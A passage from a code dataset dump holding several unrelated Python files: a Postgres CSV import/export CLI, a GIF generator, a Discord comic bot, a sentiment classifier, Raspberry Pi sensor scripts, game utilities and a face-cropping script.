peer authentication).'),\n click.option('--password', '-W', hide_input=True, prompt=False, default=None,\n help='Database password (default is to prompt for password or read config).'),\n click.option('--uri', '-L', help='Connection URI can be used instead of specifying parameters separately (also sets --no-password).', required=False)\n]\n\n# Shared command line arguments for importing/exporting tables to a directory\nDIR_TABLES_ARGUMENTS = [\n click.option('--config', '-c', type=click.Path(exists=True, dir_okay=False),\n help='Config file for customizing how tables are imported/exported.'),\n click.option(\n '--include-dependent-tables', '-i', is_flag=True,\n help='When selecting specific tables, also include ' +\n 'all tables on which they depend due to foreign key constraints.'),\n click.argument('directory', nargs=1, type=click.Path(exists=True, file_okay=False)),\n click.argument('tables', default=None, nargs=-1, callback=check_table_params)\n]\n\n\n@click.group(context_settings=dict(max_content_width=120))\n@click.option('--verbose', '-v', is_flag=True, help='Give more verbose output.')\n@click.version_option(version=__version__, message=\"%(prog)s, version %(version)s\\nSimon Muller \")\ndef main(verbose):\n \"\"\"\n Merges data in CSV files into a Postgresql database.\n \"\"\"\n setup_logging(verbose)\n\n\n@main.command()\n@decorate(DB_CONNECT_OPTIONS)\n@decorate(DIR_TABLES_ARGUMENTS)\ndef export(dbname, uri, host, port, username, no_password, password, schema,\n config, include_dependent_tables,\n directory, tables):\n \"\"\"\n Export each table to a CSV file.\n\n If one or more tables are specified then only they will be used, otherwise all tables found will be selected. They\n will all be exported into the given directory.\n \"\"\"\n engine = None\n try:\n if uri:\n no_password = True\n password = retrieve_password(APP_NAME, dbname, host, port, username, password, never_prompt=no_password)\n db_url = generate_url(uri, dbname, host, port, username, password)\n engine = sqlalchemy.create_engine(db_url)\n inspector = sqlalchemy.inspect(engine)\n schema = validate_schema(inspector, schema)\n table_graph = db_graph.build_fk_dependency_graph(inspector, schema, tables=None)\n tables = validate_tables(inspector, schema, tables)\n if include_dependent_tables:\n tables = db_graph.get_all_dependent_tables(table_graph, tables)\n if tables is None:\n tables = sorted(inspector.get_table_names(schema))\n\n config_per_table = load_table_config_or_exit(inspector, schema, config)\n find_and_warn_about_cycles(table_graph, tables)\n\n def export_tables(conn):\n return db_export.export_tables_per_config(conn, inspector, schema, directory, tables,\n config_per_table=config_per_table)\n table_count, file_count = run_in_session(engine, export_tables)\n print(\"Exported {} tables to {} files\".format(table_count, file_count))\n except Exception as exc:\n logging.exception(exc)\n finally:\n if engine is not None:\n engine.dispose()\n\n\n@main.command(name=\"import\")\n@decorate(DB_CONNECT_OPTIONS)\n@click.option('--ignore-cycles', '-f', is_flag=True,\n help='Don\\'t stop import when cycles are detected in schema' +\n ' (will still fail if there are cycles in data)')\n@click.option('--disable-foreign-keys', '-F', is_flag=True,\n help='Disable foreign key constraint checking during import (necessary if you have cycles, but ' +\n 'requires superuser rights).')\n@decorate(DIR_TABLES_ARGUMENTS)\n@click.option('--single-table', is_flag=True,\n help='An import-only option that assumes all files in the 
directory are the same type and imports ' +\n 'them all into a single table.')\ndef upsert(dbname, uri, host, port, username, no_password, password, schema,\n config, include_dependent_tables, ignore_cycles, disable_foreign_keys,\n single_table, directory, tables):\n \"\"\"\n Import/merge each CSV file into a table.\n\n All CSV files need the same name as their matching table and have to be located in the given directory.\n If one or more tables are specified then only they will be used, otherwise all tables\n found will be selected.\n \"\"\"\n engine = None\n try:\n if uri:\n no_password = True\n password = retrieve_password(APP_NAME, dbname, host, port, username, password, never_prompt=no_password)\n db_url = generate_url(uri, dbname, host, port, username, password)\n engine = sqlalchemy.create_engine(db_url)\n inspector = sqlalchemy.inspect(engine)\n schema = validate_schema(inspector, schema)\n table_graph = db_graph.build_fk_dependency_graph(inspector, schema, tables=None)\n tables = validate_tables(inspector, schema, tables)\n if include_dependent_tables:\n tables = db_graph.get_all_dependent_tables(table_graph, tables)\n\n if single_table and (tables is None or len(tables) == 0):\n print(\"One table has to be specified when using the --single-table option\")\n sys.exit()\n if single_table and len(tables) > 1:\n print(\"Only one table can be specified when using the --single-table option\")\n sys.exit()\n\n config_per_table = load_table_config_or_exit(inspector, schema, config)\n if single_table:\n import_files, dest_tables, config_per_table = generate_single_table_config(directory, tables,\n config_per_table)\n else:\n import_files, dest_tables = get_import_files_and_tables(directory, tables, config_per_table)\n run_in_session(engine, lambda conn:\n import_all_new(conn, inspector, schema, import_files, dest_tables,\n config_per_table=config_per_table,\n suspend_foreign_keys=disable_foreign_keys,\n fail_on_warning=not ignore_cycles))\n except Exception as exc:\n logging.exception(exc)\n finally:\n if engine is not None:\n engine.dispose()\n\n\n@main.command(context_settings=dict(max_content_width=120))\n@click.option('--engine', '-e', help=\"Type of database engine.\", default='postgresql', show_default=True)\n@decorate(DB_CONNECT_OPTIONS)\n@click.option('--warnings', '-w', is_flag=True, help=\"Output any issues detected in database schema.\")\n@click.option('--list-tables', '-t', is_flag=True, help=\"Output all tables found in the given schema.\")\n@click.option('--table-details', '-td', is_flag=True,\n help=\"Output all tables along with column and foreign key information.\")\n@click.option('--cycles', '-c', is_flag=True, help=\"Find and list cycles in foreign-key dependency graph.\")\n@click.option('--insert-order', '-i', is_flag=True,\n help=\"Output the insertion order of tables based on the foreign-key dependency graph. 
\" +\n \"This can be used by importer scripts if there are no circular dependency issues.\")\n@click.option('--partition', '-pt', is_flag=True,\n help=\"Partition and list sub-graphs of foreign-key dependency graph.\")\n@click.option('--export-graph', '-x', is_flag=True,\n help=\"Output dot format description of foreign-key dependency graph.\" +\n \" To use graphviz to generate a PDF from this format, pipe the output to:\" +\n \" dot -Tpdf > graph.pdf\")\n@click.option('--transferable', '-tf', is_flag=True, help=\"Output info related to table transfers.\")\ndef inspect(engine, dbname, uri, host, port, username, no_password, password, schema,\n warnings, list_tables, table_details, partition,\n cycles, insert_order, export_graph, transferable):\n \"\"\"\n Inspect database schema in various ways.\n\n Defaults to PostgreSQL but should support multiple database engines thanks to SQLAlchemy (see:\n http://docs.sqlalchemy.org/en/latest/dialects/).\n \"\"\"\n _engine = None\n try:\n if uri:\n no_password = True\n password = retrieve_password(APP_NAME, dbname, host, port, username, password, never_prompt=no_password)\n db_url = generate_url(uri, dbname, host, port, username, password, type=engine)\n _engine = sqlalchemy.create_engine(db_url)\n db_inspect.main(_engine, schema,\n warnings, list_tables, table_details, partition,\n cycles, insert_order, export_graph, transferable)\n except Exception as exc:\n logging.exception(exc)\n finally:\n if _engine is not None:\n _engine.dispose()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pgmerge/pgmerge.py","file_name":"pgmerge.py","file_ext":"py","file_size_in_byte":22992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"500000623","text":"import PIL\nfrom PIL import _imaging\nfrom PIL import Image, ImageDraw, ImageFont\nimport hashlib\nimport time\nfrom pathlib import Path\nfrom urllib.parse import urlparse\nfrom urllib.request import urlretrieve\nfrom stat import S_ISREG, ST_CTIME, ST_MODE\nimport requests\nfrom io import BytesIO\nimport sys\nimport os\nimport time\nimport re\nimport textwrap\n\nMAX_THRESHOLD = 30\nMIN_THRESHOLD = 10\n\n\ndef main():\n # if(len(sys.argv) == 1 or sys.argv[1] == ''):\n # print('./src/assets/media/bright/bright_Background.png')\n # return\n\n # Determine if image exists in save files\n location = sys.argv[1]\n save_folder = './saves/bright/'\n save_name = save_folder + hashlib.sha1(location.encode()).hexdigest() + '.gif'\n\n\n # check for already created images\n if(os.path.isfile(save_name)):\n print(save_name)\n return\n \n if(not os.path.isdir(save_folder)):\n Path(save_folder).mkdir(parents=True, exist_ok=True)\n\n if(len(os.listdir(save_folder)) >= MAX_THRESHOLD):\n files = (os.path.join(save_folder, fn)\n for fn in os.listdir(save_folder))\n files = ((os.stat(path), path) for path in files)\n files = ((stat[ST_CTIME], path)\n for stat, path in files if S_ISREG(stat[ST_MODE]))\n\n sorted_files = sorted(files)\n sorted_files.reverse()\n\n # remove oldest files\n for cdate, path in sorted_files[MIN_THRESHOLD-1:]:\n os.remove(path)\n\n # open base images to be used as the layers for the new image\n brights = [\n {\n 'source': Image.open('./src/assets/media/bright/Bright_0.png'),\n 'mask': None,\n 'position': (204, 20),\n 'size': (205, 205),\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_1.png'),\n 'mask': None,\n 'position': (213, 20),\n 'size': (209, 209),\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_2.png'),\n 'mask': None,\n 'position': (215, 20),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_3.png'),\n 'mask': None,\n 'position': (222, 20),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_4.png'),\n 'mask': None,\n 'position': (222, 25),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_5.png'),\n 'mask': None,\n 'position': (224, 25),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_6.png'),\n 'mask': None,\n 'position': (221, 30),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_7.png'),\n 'mask': None,\n 'position': (222, 35),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_8.png'),\n 'mask': None,\n 'position': (222, 35),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_9.png'),\n 'mask': Image.open('./src/assets/media/bright/Bright_9_mask.png'),\n 'position': (222, 35),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_10.png'),\n 'mask': Image.open('./src/assets/media/bright/Bright_10_mask.png'),\n 'position': (26, 52),\n 'size': (204, 204)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_11.png'),\n 'mask': Image.open('./src/assets/media/bright/Bright_11_mask.png'),\n 'position': (0, 38),\n 'size': (193, 193)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_12.png'),\n 'mask': None,\n 'position': (-171, 55),\n 'size': (188, 188)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_13.png'),\n 'mask': None,\n 'position': (0, 0),\n 'size': (0, 0)\n },\n {\n 
'source': Image.open('./src/assets/media/bright/Bright_14.png'),\n 'mask': None,\n 'position': (0, 0),\n 'size': (0, 0)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_15.png'),\n 'mask': None,\n 'position': (0, 0),\n 'size': (0, 0)\n }\n\n ]\n\n user_img = None\n animation_frames = []\n\n # determine if this is a URL\n if(urlparse(location).scheme != ''):\n response = requests.get(location)\n\n user_img = Image.open(BytesIO(response.content)).convert('RGBA')\n\n for bright in brights:\n # create a new empty image with alpha, set to base image size\n new_img = Image.new('RGBA', (498, 373))\n\n # paste the initial base image on the frame\n new_img.paste(bright[\"source\"], (0, 0), bright[\"source\"])\n\n if user_img is not None and bright[\"size\"] != (0, 0):\n # real copies of the user image and frame, so the originals stay untouched between frames\n user_img_copy = user_img.copy()\n frame_copy = new_img.copy()\n\n # scaling the user image copy to fit the mask\n user_img_copy.thumbnail(bright[\"size\"])\n\n # paste the user image onto the temporary frame\n frame_copy.paste(user_img_copy, (\n (int)(bright[\"position\"][0] +\n (bright[\"size\"][0] - user_img_copy.size[0])/2),\n (int)(bright[\"position\"][1] +\n (bright[\"size\"][1] - user_img_copy.size[1])/2)\n ), user_img_copy)\n\n # mask the frame onto the original so the user image only shows through the mask\n new_img.paste(frame_copy, (0, 0), mask=bright[\"mask\"])\n\n # add frame to the animation frames list\n animation_frames.append(new_img)\n\n # repeat the last frame 7 more times so the gif lingers on the final image\n for i in range(1, 8):\n animation_frames.append(animation_frames[len(animation_frames) - 1])\n\n # exporting gif\n animation_frames[0].save(save_name,\n save_all=True, append_images=animation_frames[1:], optimize=False, duration=60, loop=0)\n\n print(save_name)\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/scripts/bright.py","file_name":"bright.py","file_ext":"py","file_size_in_byte":6482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"636868707","text":"# -*- coding: utf-8 -*-\nimport csv\n\n\nclass SystemStats(object):\n def __init__(self, stats, system_type):\n self.stats = stats\n self.system_type = system_type\n\n @staticmethod\n def print_stats_header():\n print(\n '{:>6} {:>6} {:>10} {:>12} {:>10} {:>8} {:>10}'\n .format(\n 'Step #', 'CPUs', 'Diameter', 'Diameter_Avg', 'Degree', 'Cost',\n 'Traffic'\n )\n )\n\n def print(self):\n \"\"\" Pretty-print scaling stats \"\"\"\n self.print_stats_header()\n for s in self.stats:\n print(\n '{step:>6} {node_count:>6} {diameter:>10} '\n '{avg_diameter:>12.4f} {degree:>10} {cost:>8} {traffic:>10.4f}'\n .format(\n **s\n )\n )\n\n def to_csv(self, filename):\n \"\"\" Write the stats to a CSV file \"\"\"\n\n # Field names are names of the stats\n field_names = self.stats[0].keys()\n\n # Do not leave empty lines between rows\n with open(filename, 'w', newline='') as csvf:\n writer = csv.DictWriter(csvf, fieldnames=field_names)\n\n writer.writeheader()\n for s in self.stats:\n writer.writerow(s)\n","sub_path":"mpp_evaluator/stats_formatter.py","file_name":"stats_formatter.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"573328967","text":"# bot.py - Entry point of bot\n\n# misc imports\nimport json\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n\n# discord imports\nimport discord\nfrom discord.ext import commands\nimport asyncio\n\nimport requests\n\n# mongodb\nimport pymongo\n\n# load config\nfrom config import config\n\n# connect to mongo\nmongo = pymongo.MongoClient(f\"mongodb+srv://{config['mongo_user']}:{config['mongo_pass']}@{config['mongo_host']}/test?retryWrites=true\")[\"comics\"]\n\ndef get_prefix(bot, message):\n prefix = mongo['guilds'].find({'guild_id': str(message.guild.id)}, {'_id': 0, 'prefix': 1}).next()['prefix'] # Get prefix from mongodb\n return commands.when_mentioned_or(prefix)(bot, message)\n\nbot = commands.Bot(command_prefix=get_prefix)\n\ndef add_guild(guild_id):\n # Add the guild to the mongo db\n\n doc = {\n 'guild_id': guild_id,\n 'comic_channel': \"\",\n 'comic_webhook': \"\",\n 'subscribed_comics': [],\n 'prefix': \",\"\n }\n\n mongo['guilds'].insert_one(doc)\n print(f\"Added guild {guild_id} to mongodb\")\n\n@bot.event\nasync def on_ready():\n print(f\"Logged in as {bot.user.name} - {bot.user.id}\")\n update_guild_count()\n # Check if the bot has joined any guilds since it was last launched\n for guild in bot.guilds:\n # See if guilds collection contains a collection whose guild is the guild id\n guild_id = str(guild.id)\n num = mongo[\"guilds\"].count_documents({\"guild_id\": guild_id})\n\n if num == 0:\n add_guild(guild_id)\n \n@bot.event\nasync def on_guild_join(guild):\n guild_id = str(guild.id)\n if mongo['guilds'].count_documents({'guild_id': guild_id}) == 0:\n add_guild(guild_id)\n \n update_guild_count()\n\n@bot.event\nasync def on_guild_remove(guild):\n update_guild_count()\n\ndef update_guild_count():\n requests.post(url=f\"https://discordbots.org/api/bots/{bot.user.id}/stats\", headers={'Authorization': config['discord_bots_token']}, data={'server_count': len(bot.guilds)})\n\nif __name__ == \"__main__\":\n bot.remove_command(\"help\")\n bot.load_extension(\"admin\")\n bot.load_extension(\"comic\")\n bot.load_extension(\"settings\")\n bot.run(config['bot_token'], bot=True)","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"162856099","text":"#This script is the classification script for Textblob that was used for its final sentiment analysis results.\n\nimport csv \nfrom textblob import TextBlob\n\npredicted_labels = []\ntweets = []\n\ndef sentiment(file, proFile):\n with open(file, 'r', encoding=\"utf-8\") as csvFile:\n reader = csv.reader(csvFile, delimiter=\",\")\n for row in reader:\n tweets.append(row)\n text = row[1] \n analysis = TextBlob(text)\n if analysis.sentiment[0] < 0:\n predicted_label = \"negative\"\n predicted_labels.append(predicted_label)\n else:\n predicted_label = \"positive\"\n predicted_labels.append(predicted_label)\n\n idx = 0\n while idx < len(predicted_labels):\n tweets[idx].append(predicted_labels[idx])\n print(tweets[idx])\n idx = idx + 1\n\n with open(proFile, 'w', encoding=\"utf-8\", newline=\"\") as csvFile:\n writer = csv.writer(csvFile, delimiter=\",\")\n for row in tweets:\n writer.writerow(row)\n \n\n\nsentiment('amazon_tweets_processed.csv', 'amazon_textblob.csv')#Change these outputs depending on what data was being classified.\nprint(tweets)","sub_path":"Python Scripts/Classifiers/Text Blob Classifier.py","file_name":"Text Blob Classifier.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"109377946","text":"import RPi.GPIO as GPIO\nimport time\nimport requests\nimport sys\nimport numpy as np\nimport socket\nimport sensor.tail_servo_main as tail_servo_main\nimport dataCenter\n\n#initialise a previous input variable to 0 (Assume no pressure applied)\nglobal prev_head_touch, prev_body_touch\nprev_head_touch = False\nprev_body_touch = False\n\nglobal touch_count\ntouch_count = 0\n\nGPIO.setmode(GPIO.BOARD)\n\ndef request_touch():\n global touch_count\n data = {'user_id' : dataCenter.user_id, 'sensor_id': dataCenter.touch, 'num' : touch_count, 'day': 'Sunday'}\n # data = {'user_id' : 1, 'sensor_id': 5, 'num' : touch_count, 'day': 'Sunday'}\n requests.post(dataCenter.URL, json=data)\n touch_count = 0\n print(touch_count)\n\ndef setup_touch(head_touch_pin, body_touch_pin):\n # set up pins\n GPIO.setup(head_touch_pin,GPIO.IN)\n GPIO.setup(body_touch_pin,GPIO.IN)\n\n return head_touch_pin, body_touch_pin\n\ndef cleanup_touch(head_touch_pin, body_touch_pin):\n GPIO.cleanup(head_touch_pin)\n GPIO.cleanup(body_touch_pin)\n\ndef check_touch(head_touch_pin, body_touch_pin):\n head_touch = GPIO.input(head_touch_pin)\n body_touch = GPIO.input(body_touch_pin)\n return head_touch, body_touch\n\ndef main():\n # setup pins\n body_servo, tail_servo = tail_servo_main.setup_tail(dataCenter.body_pin, dataCenter.tail_pin)\n head_touch_pin, body_touch_in = setup_touch(dataCenter.head_touch_pin, dataCenter.body_touch_pin)\n # body_servo, tail_servo = tail_servo_main.setup_tail(36, 38)\n # head_touch_pin, body_touch_pin = setup_touch(11, 13)\n while True:\n global touch_count\n global prev_head_touch, prev_body_touch\n head_touch, body_touch = check_touch(dataCenter.head_touch_pin, dataCenter.body_touch_pin)\n # head_touch, body_touch = check_touch(11, 13)\n #check_touch(input_head, input_body)\n if (prev_head_touch and (not prev_body_touch)) and body_touch:\n print(\"head to body\")\n # touch_count += 1\n # shake tail\n #tail_servo_main.shake_tail(body_servo, tail_servo)\n elif (prev_body_touch and (not prev_head_touch)) and head_touch:\n print(\"body to head\")\n # touch_count += 1 \n elif (not prev_head_touch) and head_touch:\n print(\"only head\")\n elif (not prev_body_touch) and body_touch:\n print(\"only body\")\n tail_servo_main.shake_tail(body_servo, tail_servo)\n touch_count += 1\n\n #update previous input\n prev_head_touch = head_touch\n prev_body_touch = body_touch\n\n time.sleep(0.1)\n tail_servo_main.cleanup_tail(dataCenter.body_pin, dataCenter.tail_pin)\n cleanup_touch(dataCenter.head_pin, dataCenter.body_pin)\n # tail_servo_main.cleanup_tail(36, 38)\n # cleanup_touch(11, 13)\n\nif __name__ == \"__main__\":\n main()","sub_path":"robot109/sensor/touch_main.py","file_name":"touch_main.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"274713551","text":"# --------------------------------------------------- #\n# -------------------- IMPORTS\n\nimport webbrowser\n\nfrom joueur import Head\nfrom variables import *\nfrom tkinter import Toplevel, Label, Button, Frame, LEFT, BOTH, messagebox\n\n\n# --------------------------------------------------- #\n# -------------------- FUNCTION FENETRE\n\n# -------------------- affichage en cas d'erreur\ndef help_clignotante(root):\n\n def erreur_en_cours_to_false():\n root.erreur_en_cours = False\n\n def affiche_message_erreur_menu(n):\n if n == 0:\n help_menu.add_cascade(label='<-- game.ERROR : mauvaise manip\\'', font=FONT_IMPORTANT)\n elif n == 1:\n help_menu.add_cascade(label='<-- game.ERROR : mauvaise manip\\' x2', font=FONT_IMPORTANT)\n elif n == 2:\n help_menu.add_cascade(label='<-- game.ERROR : mauvaise manip\\' x3 (dernière fois...)', font=FONT_IMPORTANT)\n else:\n help_menu.master.destroy()\n\n root.nombre_erreur += 1\n if root.nombre_erreur % 3 == 0:\n messagebox.showerror(\"Erreur de manipulation\", ERREUR_MSG)\n \n elif not root.erreur_en_cours:\n root.erreur_en_cours = True\n help_menu = root.master.master.master.children['!menu']\n help_menu._tclCommands = list()\n for i in range(0, 4000, 1000):\n help_menu.after(i, affiche_message_erreur_menu, root.nombre_erreur//3)\n help_menu.after(500+i, help_menu.delete, 'end') \n root.after(4000, erreur_en_cours_to_false)\n return None\n\n\n# -------------------- changement des options par défauts de tkinter\ndef set_options(root):\n root.option_add(\"*Font\", FONT_NORMAL)\n root.option_add(\"*Background\", BG_COLOR)\n root.option_add(\"*Foreground\", COLOR_2)\n root.resizable(width=False, height=False)\n root.geometry(\"%dx%d\" % (SCREEN_WIDTH, SCREEN_HEIGHT))\n return None\n\n\n# -------------------- parce que c'est marrant <<< EASTER EGG >>>\ndef webpage(event, n):\n if n == 0:\n webbrowser.open_new(r\"https://en.wikipedia.org/wiki/Blockade_(video_game)\")\n else:\n webbrowser.open_new(r\"https://mime.univ-lille.fr/formation/licence-miashs/\")\n return None\n\n\n# --------------------\ndef komenkonjou():\n toplevel = Toplevel()\n frame = Frame(toplevel)\n \n Label(frame, text=TITRE_REGLES).pack()\n Label(frame, text=REGLES, justify=\"left\", font=FONT_MENU).pack()\n Button(frame,\n text='Regles spéciales pour notre professeur adoré',\n command=lambda: komenkonjou_specialprof(toplevel)).pack(pady=(20, 0))\n\n frame.pack(ipadx=10, ipady=10, padx=10, pady=10)\n return None\n\n\n# --------------------\ndef komenkonjou_specialprof(sublevel=None):\n if sublevel is not None:\n sublevel.destroy()\n\n toplevel = Toplevel()\n\n frame = Frame(toplevel)\n Label(frame, text=TITRE_REGLES_PROF).pack()\n Label(frame, text=REGLES_PROF, font=FONT_MENU).pack()\n frame.pack(ipadx=5, ipady=5, padx=5, pady=5)\n return None\n\n\n# --------------------\ndef kelsonlestouches():\n toplevel = Toplevel()\n frame = Frame(toplevel)\n Label(frame, text=TITRE_REGLES_TOUCHES).pack()\n Label(frame, text=REGLES_TOUCHES, font=FONT_MENU, justify=LEFT).pack()\n frame.pack(ipadx=5, ipady=5, padx=5, pady=5)\n return None\n\n\n# -------------------- \ndef ask_quit(root):\n top = Toplevel()\n \n Label(top, text='Etes vous sur de vouloir quitter ce superbe jeu ?').pack()\n \n frame_button = Frame(top)\n \n Button(frame_button, text='Annuler', command=top.destroy).pack(side=LEFT, expand=True)\n Button(frame_button, text='Quitter', command=root.destroy).pack(side=LEFT, expand=True)\n \n frame_button.pack(fill=BOTH, expand=True)\n return None\n\n\n# 
--------------------\ndef set_taille_plateau(taille_plateau):\n if taille_plateau.get() == 'Petit':\n return (6, 6), (0, 11, 13, 15)\n elif taille_plateau.get() == 'Moyen':\n return (8, 8), (0, 9, 10, 11)\n elif taille_plateau.get() == 'Grand':\n return (10, 10), (0, 9, 10, 11)\n else:\n return (12, 12), (0, 8, 9, 10)\n\n\n# --------------------\ndef set_profondeur(difficulte, profondeurs):\n if difficulte.get() == 'Facile':\n return profondeurs[0]\n elif difficulte.get() == 'Moyen':\n return profondeurs[1]\n elif difficulte.get() == 'Difficile':\n return profondeurs[2]\n else:\n return profondeurs[3]\n\n# --------------------------------------------------- #\n# -------------------- FUNCTIONS INGAME\n\n# -------------------- fin de partie\ndef fin_partie(player):\n if player.jepeuallerla == list():\n return True\n\n else:\n return False\n\n\n# -------------------- affiche qui est le meilleur joueur\ndef cmoileplufort(gagnant):\n if gagnant == \"égalité\":\n text_victoire = 'Le gagnant est... Euh... Il n\\'y en a pas... Nous sommes face à une égalité...'\n elif gagnant.psyche == 'IA':\n text_victoire = 'Le gagnant est %s,\\nla super intelligence artificielle :p' % gagnant.nom\n else:\n text_victoire = 'Le gagnant est %s !!' % gagnant.nom\n messagebox.showinfo(\"And the winner is...\", text_victoire)\n return None\n\n\n# -------------------- fonction pour kantutemangelebonus\ndef kantutemangelebonus(plateau, enemy):\n if len(enemy.body) == 1:\n return False\n elif len(enemy.body) > 5:\n nb_suppr = 5\n else:\n nb_suppr = len(enemy.body) - 1\n\n # comme le for demarre a 1 on fait +1 a la fin\n for i in range(1, nb_suppr + 1):\n enemy.body[-i].delete(plateau=plateau)\n enemy.body = enemy.body[:-nb_suppr]\n\n enemy.head.delete(plateau=plateau)\n enemy.head = Head(plateau=plateau,\n new_x=enemy.body[-1].x,\n new_y=enemy.body[-1].y,\n n=enemy.n)\n return None\n\n\n# -------------------- heeeeeeeeeeeeeeeeuristik\ndef heuristique_2_0(plateau, taille_plateau, player, enemy):\n\n case_atteignable_player = []\n case_atteignable_enemy = []\n\n n_case_atteignable_player = [[player.head.y, player.head.x], ]\n n_case_atteignable_enemy = [[enemy.head.y, enemy.head.x], ]\n\n while not n_case_atteignable_player == [] or not n_case_atteignable_enemy == []:\n\n temp_player = []\n for case in n_case_atteignable_player:\n\n if case[0] != 0:\n if plateau[case[0] - 1, case[1]] in [0, -1]:\n temp_player.append([case[0] - 1, case[1]])\n\n if case[0] != taille_plateau[1] - 1:\n if plateau[case[0] + 1, case[1]] in [0, -1]:\n temp_player.append([case[0] + 1, case[1]])\n\n if case[1] != 0:\n if plateau[case[0], case[1] - 1] in [0, -1]:\n temp_player.append([case[0], case[1] - 1])\n\n if case[1] != taille_plateau[0] - 1:\n if plateau[case[0], case[1] + 1] in [0, -1]:\n temp_player.append([case[0], case[1] + 1])\n\n n_case_atteignable_player = []\n for case in temp_player:\n if case not in case_atteignable_enemy and case not in case_atteignable_player and case not in n_case_atteignable_player:\n n_case_atteignable_player.append(case)\n\n case_atteignable_player += n_case_atteignable_player\n\n temp_enemy = []\n for case in n_case_atteignable_enemy:\n\n if case[0] != 0:\n if plateau[case[0] - 1, case[1]] in [0, -1]:\n temp_enemy.append([case[0] - 1, case[1]])\n\n if case[0] != taille_plateau[1] - 1:\n if plateau[case[0] + 1, case[1]] in [0, -1]:\n temp_enemy.append([case[0] + 1, case[1]])\n\n if case[1] != 0:\n if plateau[case[0], case[1] - 1] in [0, -1]:\n temp_enemy.append([case[0], case[1] - 1])\n\n if case[1] != 
taille_plateau[0] - 1:\n if plateau[case[0], case[1] + 1] in [0, -1]:\n temp_enemy.append([case[0], case[1] + 1])\n\n n_case_atteignable_enemy = []\n for case in temp_enemy:\n if case not in case_atteignable_player and case not in case_atteignable_enemy and case not in n_case_atteignable_enemy:\n n_case_atteignable_enemy.append(case)\n\n case_atteignable_enemy += n_case_atteignable_enemy\n \n return len(case_atteignable_player), len(case_atteignable_enemy)\n\n\n# --------------------------------------------------- #\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"463427049","text":"from time import sleep\nfrom picamera import PiCamera\nfrom picamera import array\nimport cv2 \n\ndef detect_faces(cascade, test_image, scaleFactor = 1.1):\n # create a copy of the image to prevent any changes to the original one.\n image_copy = test_image.copy()\n \n gray_image = test_image\n \n # Applying the haar classifier to detect faces\n faces_rect = cascade.detectMultiScale(gray_image, scaleFactor=scaleFactor, minNeighbors=5)\n\n #Create an list of images if a face is found crop that face and append it to\n #the list, return the list when done\n img =[]\n for (x, y, w, h) in faces_rect:\n cv2.rectangle(image_copy, (x, y), (x+w, y+h), (0, 255, 0), 15)\n img.append(image_copy[y:y+h, x:x+h].copy())\n \n return img\n\nif __name__ == \"__main__\":\n #The purpose of this program was to test multiple face detection using the camera\n\n \n camera = PiCamera()\n camera.resolution = (1024, 768)\n camera.start_preview()\n \n # Camera warm-up time\n sleep(2)\n\n #creating a RGB array from PiCamera's classes to avoid encoding and decoding a jpeg\n #ideally speeding up the process, then formating it a BGR array so we can pass it to OpenCV\n stream = array.PiRGBArray(camera)\n camera.capture(stream, format='bgr') \n image = stream.array\n \n haar_cascade_face = cv2.CascadeClassifier('haarcascade_frontalface_alt2.xml')\n faces = detect_faces(haar_cascade_face, image)\n i = 0\n #Check for faces in result and write it to a png file\n for face in faces:\n fileName = f\"result{i}.png\"\n cv2.imwrite(fileName,face)\n i+=1\n \n #Following lines are just for showing results to screen, press 'O' to close window\n cv2.imshow('res', face)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","sub_path":"croping_multiple_faces_using_camera.py","file_name":"croping_multiple_faces_using_camera.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
